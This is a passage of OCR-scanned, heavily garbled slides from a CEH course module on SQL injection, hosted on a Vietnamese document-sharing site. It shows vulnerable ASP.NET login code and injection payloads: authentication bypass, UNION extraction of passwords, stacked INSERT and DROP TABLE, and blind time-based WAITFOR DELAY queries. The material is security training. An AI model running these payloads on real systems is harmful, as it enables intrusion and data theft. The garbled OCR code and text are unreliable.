1. Trang chủ
  2. » Tất cả

CEHv8 module 14 SQL injection

94 218 0
Tài liệu được quét OCR, nội dung có thể không chính xác
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 94
Dung lượng 6,56 MB

Nội dung

Học viện Công Nghệ Thông Tin Bach Khoa SOL Injection © SQL Injection is the © Itisa © Most programmers are most common bsi and not a still of this ron the database or web threat Int

Trang 1

Module 14

Engineered by Presented by Professionals

Certified Ethical Hacker

Trang 3

Học viện Công Nghệ Thông Tin Bach Khoa

II IWIodule Objectives

SQL Injection Attacks Injection

SQL Injection Detection Password Grabbing

Evasion Technique

How to Defend Against SQL Injection

Trang 5

Học viện Công Nghệ Thông Tin Bach Khoa

SOL Injection

© SQL Injection is the © Itisa © Most programmers are

most common bsi and not a still of this

ron the database or web threat Internet server issue

Œ —= 6

Trang 6

, the biggest identity theft case ever prosecuted OOst

sniffer software on the companies’ servers to intercept credit L i S

Trang 7

Học viện Công Nghệ Thông Tin Bach Khoa

Trang 8

Học viện Công Nghệ Thông Tin Bach Khoa

© Spoofing Identity Changing Price

on the Server 9fData

Copyright © by E€-Ceeecil All Rights Reserved Reproduction is Strictly Prohibited

Trang 9

SQL injection is a technique used to take advantage of non-validated

input vulnerabilities to pass SQL commands through a web application

for execution by a backend database

SQL injection is a basic attack used to either gain unauthorized access to

a database or to retrieve information directly from the database

Trang 10

§ On the basis of pli used and the way it ppliedd , SQL injection

can be used to implement the attacks mentioned below:

1 SS P.2 = Using this attack, an attacker logs onto an application

=

4

and gains administrative privileges

compromise the host OS „ obtains sensitive information that

— y is stored in the database

Attackers use this attack to delete Œ#&® web page, insert malicious content into the database information, delete web pages, or alter the contents of a

log, or audit information that is lage nies

stored in a database

ee eee | Rights Reserved Reproduction is Strictly Prohibited

Trang 12

Học viện Công Nghệ Thông Tin Bach Khoa

Powerful server-side technologies like ASP.NET and

database servers allow developers to

The power of ASP.NET and SQL can easily be ex; SOL

using SQL injection attacks Server

All relational databases, SQL Server, Oracle, IBM DB2, |

and MySQL, are susceptible to F

ee SQL injection attacks do not exploit a specific software

vulnerability, instead they that do not eS follow s for accessing and ` _ manipulating data stored in a relational database

.,

Trang 13

When a user provides information and clicks Submit, the browser submits a string to the web <f rm me yi-bin/ gin server that contains the user's credentials me thod=post>

This string is visible in the body of the HTTP or Username: <input type~text

Password <input

SQL query at the database type~-password name-password>

Copyright © by | All Rights Reserved Reproduction is Strictly Prohibited

Trang 14

Học viện Công Nghệ Thông Tin Bach Khoa

Example 1: Norrnal SQL, Query

c2 c2 http-//jugg@yboy.com/SadLlogin aspx BadLogin.aspx.cs

2 JugeyBoy.com

~~

System.FventArgs e) { string strcnx =

“server”

localhost ;database~rnorthwind ;vid-sa :pwd-;”"

Sqiconnection cnx * new SqlConnection (strCcnx) cnx Open() ;

//This code is susceptible to SQL injection

attacks

string strQry = "SELECT Count(*) FROM

"" AND Password='" + txtPassword.Text +

#

¬e.~

int intRecs

intRecs @ (tint) cmd.ExecuteScalar ()

SELECT Count(*) FROM Users WHERE

Server-side Code (BadLogin.aspx)

Trang 15

Học viện Công Nghệ Thông Tin Bach Khoa

Code after are now comments

Copyright © by E®-Ceeecil All Rights Reserved Reproduction is Strictly Prohibited

Trang 16

The user is then authenticated and redirected to the

SELECT Count(*) FROM

Users WHERE UserName='‘blah' Or i=1

AND Password=''

Because a pair of hyphens designate the beginning of a comment in SQL, the query simply becomes:

SELECT Count(*) FROM

UserName='‘blah' Or i=l

A

FROM Users WHERE UserName= 4

Copyright © by E©-Gemmcil All Rights Reserved Reproduction is Strictly Prohibited

Trang 17

mw sBK ACAD

4 This page displays products

from the Northwind

to filter the resulting list of products using a textbox

private void cmdPilter Click{object sender, System.EventArgs e) ( T d Fil

adgrProducts.CurrentPageiIndex -~- 0 called txtrilter bindDataGrid(); }

private void bindDataGrid() {

agrProducts DataSource ~ createDataViews) : adgrProducts DataBind({); }

Like the previous

private DataView createDataView () {

“server localhost : videsa : pwd :database-«northwind:* this code is vulnerable to

eatring strSQL =~ “SELECT Productid, ProductName, * +

"QOuantityPerUnit, UnitPrice FROM Products” SOL injection attacks

//Thiasa code is susceptible to SQL injection attacks

txtFiiter Text Length ,

Saqiconnection cnx - new Sq1iCconnection(strCnx) -

SqibdataAdapter ada “^ new SqlDataAAdapter (strSQL, cCñnx) The executed SQL iS

from a user-supplied input

Trang 18

DAI HOC

.- lesan veces mils

«ti oon peril

+ eess- eese-

i285 eer 1 đ

= ` x password, 0 from users

User names and Passwords are dinplayed

SQL Query Executed

SELECT Productid, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE

ProductName LIKE ‘blah’ UNION Select 0, username, password, O from users

Copyright © by §@-Gemecil All Rights Reserved Reproduction is Strictly Prohibited.

Trang 19

Học viện Công Nghệ Thông Tin Bach Khoa

Attacker Launching SQL Injection Email Address

Your password will be sent to your registered email address

SQL Injection Vulnerable Website

Copyright © by E6-Ceancil All Rights Reserved Reproduction is Strictly Prohibted

Trang 20

Attacker Launching SQL Injection Email Address

Your password will be sent to your bình INSERT INTO $b-customers (' 4b-emai Ì 4% registered email address

pasewd’.‘jb-login id tb-last name*) VALUES

(*‘ jJasonGspringficid.com he 1 1 jason jason

SQL Query Executed

SELECT jb-email, jb-passwd, jb-login_id, 3b-last_name FROM members

WHERE email = ‘blah’; INSERT INTO j3b-customers (' jb-email 3b-passwd' jb-login_id ° 1b-

last name') VALUES ('Jjason@springfield.com ‘hello jason’, ‘jason spríngfield'") ;: ' ;

Copyright © by t©-Ce@wwCdl, All Rights Reserved Reproduction is Strictily Prohibited

Trang 21

Học viện Công Nghệ Thông Tin Bach Khoa

SELECT jb-email, jb-passwd, jb-login_id, jb-last_nmame FROM table WHERE jb-email =

Trang 22

Học viện Công Nghệ Thông Tin Bach Khoa

Attacker Launching SQL Injection Email Address

Your password will be sent to your registered email address

Trang 24

ĐẠI HỌC

STEP 6: Detailed error messages STEP 1: Check if the web

provide a wealth of information to oO

an attacker in order to execute

SQL injection

oO application connects toa

Database Server in order to access some data

STEP 5: The UNION operator is used to combine the result-set of ©

two or more SELECT

STEP 4: Try to insert a string

value where a number is expected in the input field

STEP 3: Attempt to inject codes into the input fields to

generate an error

Trang 25

Học viện Công Nghệ Thông Tin Bach Khoa

input fields to generate an error

(;), comments {( ), AND, and OR error '80040e14"

c.ccccc 1 3 [Microsoft] [ODBC SQL Server Driver] [SQL

Server)]Unclosed quotation mark before the

Microsoft OLE DB Provider for ODBC Drivers

Êsseseeososssseseesessessessssessb error '80040607' [Microsoft] [ODBC SOL

Try to insert a string value Server Driver] [SQL Server]Syntax error

in the input field column of data type int /visa/credit.aspx

Trang 26

Addition, concatenate (or space in url)

(Double pipe) concatenate

Wildcard attribute indicator

?Paramiztoo&Param2=bar

@variable 8@variable

waittor delay 0:0:10"

®@version

URL Parameters

Useful as non- transactional command

Local variable

Global variable

Time delay

Displays SQL server version

Trang 27

Học viện Công Nghệ Thông Tin Bach Khoa

Method 1 Function Testing wii Thing

- This testing falls within the scope of black

ma box testing, and as such, should require no © http:///US6yboy/?parameter=123

inputting massive amount of random data ev http://juggyboy/?parameter=1

and observing the changes in the output

| method aa Static/Dynamic Testing

Trang 28

@ Send single quotes as the input data to 4 @ Use right square bracket (the ]

catch instances where the user input is fr ` "` character} as the input data to catch

not sanitized k Mu 3 instances where the user input ¡s used

@ Send double quotes as the input data to as part of a SQL identifier without any

catch instances where the user input is input sanitization

W@ Send long strings of single quote characters @ Send long strings of junk data, just as

(or right square brackets or double quotes) : aw you would send strings to detect buffer

@ These max out the return values from ồ "Á overruns; this action might throw SQL

REPLACE and QUOTENAME functions and ' errors on the page

might truncate the command variable used

to hold the SQL statement

Trang 29

Học viện Công Nghệ Thông Tin Bach Khoa

Testing for SOL Injection

Testing String

1' or '1'='1 value' or '1'='2 1' and '1'='2 1'or'ab-'a'+'b 1' or'ab'='a'”b

et oe) oe we

Variations

*}; [SQL Statement]; '1/1S5QL Scmament];#

14SQL Statemeet]:—

k;{SQt Statamant];#

Testing String

‘; drop table users—

ijor fata Db 1e ra» v | |

Testing String

PT isla Mea ađmin' #

Trang 30

lo 2G „7

Học viện Công Nghệ Thông Tin Bach Khoa

Testing for SOL Injection

' union select “ from users where login

"some'+'thing'

_*OR 'something'

like 'some*%"

* OR ‘whatever in (‘whatever’)

‘OR 2 BETWEEN 1 and 3

* or username like char{37];

*s EXEC (‘SEL + ‘ECT

+ortisnull<281%2F 0% 29+%2F*

*; drop table temp

Trang 33

System Stored Procedure

Attackers exploit databases’ stored procedures to perpetrate their attacks

“UNION SELECT” statement returns

the union of the intended dataset

with the target dataset

After injecting code into a

particular field, legitimate

code that follows is nullified through usage of end of line comments

SELECT Name Phone, Address

FROM Users WHERE Id-!1

ereditCardNumber,1,1 FROM

CreditCardTabic

An attacker may gain knowledge by injecting illegal/logically incorrect

requests such as injectable parameters,

data types, names of tables, etc

Injecting statements that are

always true so that queries always

return results upon evaluation ofa

WHERE condition

Trang 34

Học viện Công Nghệ Thông Tin Bach Khoa

http:-//juggyboy com/page aspx?id=

[DB_NAME] Returned from the server

Union SQL Injection - Extract Table

Database Tables

http:-//juggyboy com/page aspx?id=

[EMPLOYEE TABLE] Returned from the server

¬ Union SQL Injection - Extract 1st

Field Data

http: //juggyboy com/page aspx?id=:

[FIELD 1 VALUE] Returned from the server

Trang 35

Học viện Công Nghệ Thông Tin Bach Khoa

Extract Database Name

© Syntax error converting the nvarchar value [DB

NAME]' to a column of data type int

Extract ist Table Column Name

© Syntax error converting the nvarchar value

‘[(COLUMN NAME 1]' to a column of data

type int

eal SOL Injection Error Based

Extract ist Database Table

© Syntax error converting the nvarchar value

‘TTABLE NAME 1]‘ to a column of data type int

Extract ist Field of ist Row (Data)

© Syntax error converting the nvarchar value

‘TFIELD 1 VALUE] to a column of data type int

Trang 37

asus BKkK AGAR

Blind SQL Injection is used Blind SQL injection is identical This type of attack can

when a web application is to a normal SQL Injection become time-intensive

vulnerable to an SQL except that when an attacker because a new statement

injection but the results of attempts to exploit an must be crafted for each

application rather than seeing bit recovered

a useful error message, a

generic custom page is

Trang 38

ODBC Drivers error *‘80040e14"

Driver] (SQL Server] Unclosed quotation mark before the

Trang 39

WAIT FOR DELAY ‘time’ (Seconds)

This is just like sleep, wait for specified time CPU-safe way to make database wait

We are unable to process your request Please try back later

Copyright © by All Rights Reserved Reproduction is Strictly Prohibited

Trang 40

Học viện Công Nghệ Thông Tin Bach Khoa

/?id=1+AND+555=if (ord (mid( (select+pass+from

users¢limit+0,1) ,1,1))=/| 97), 555,777) Searching for the second character

: “ and the first character of the first

7 (letter “a”), then

Trang 41

Học viện Công Nghệ Thông Tin Bach Khoa

Check for username length

nttp://jJuggybPoy com/page aspx 71d—1 IP (LEN (OUSER)—1) WAITPOR DELAY *00:00:10'"

http: //JugqgyPoy com/page aspx 7id=1 IP (LEN (USER)=<2?) WAITPOR DELAY ‘*00:00:10'

http: // jug¢gybPoy com/page aspx?7id=1 TP (LEN (USER)=<3)} WAITPOR DELAY ‘*‘00:00:10°

ail Fe

http: //juggyboỵ com/peage aspx ?7id=} IP (ASCII (lower (substring ( (USER) 1,1))) ) WAITPOR DELAY "09:06:19"

http: // juggyboy com/peage aspz7id-1: 1V (ASCII (lower (substring( (USER) 1,.1)))- } WAITPOR OBLAY ‘00:00:10"

http: // Juggyboy com/page -aspz7id-} IP (ASCII (lower (substring ({ (USER) 1,1)))=< ) WAITFOR DELAY ‘00:00:10°*

Check if 2°° character in username contains ‘A’ (a=97), ‘B', or ‘C’ etc

7 http: //jugg¢yboỵ com/page aspx?id=1: IF (ASCII (lower (substring({ (USER) ,2,1))) ) MAITPOR DELAY *00:00:1(

http: //iuggyboỵcom/paoc a4px2?1đ=1 IF (ASC11(1cwer(substrirg( (USPFR),2,1)))* ) WAITFOR DELAY ‘00:00:i1¢

http: //juggyboy com/peage aspz? id=} IP (ASCII (lower (substring( (USER) 2,1)))- ) MAITITFOR DELAY ‘00:00:10

| ——

http: //1uggyboỵCccm/paqệ Aaspx2?1đd-1 IF (ASCII(1lower(substrtng( (USER),3,1})})~* ) MATITFGR DELAY '*00: 00: 101

` http: // juggyboy com/page aspz7id=1; IF (ASCII (lower(substring({ (TSER) ,3,1)))- ) MATTFCOH DELAY ‘00:00:10"

http: // jugqyboy com/page _ aspx ?id=1 IP «ASCII (lower (substring ( (USER) ,3,1)))-= } WAITPOR DELAY ‘0O0:00:10*

Copyright © by E©-Ceesecil All Rights Reserved Reproduction is Strictly Prohibited

Ngày đăng: 14/12/2021, 18:41

TỪ KHÓA LIÊN QUAN

w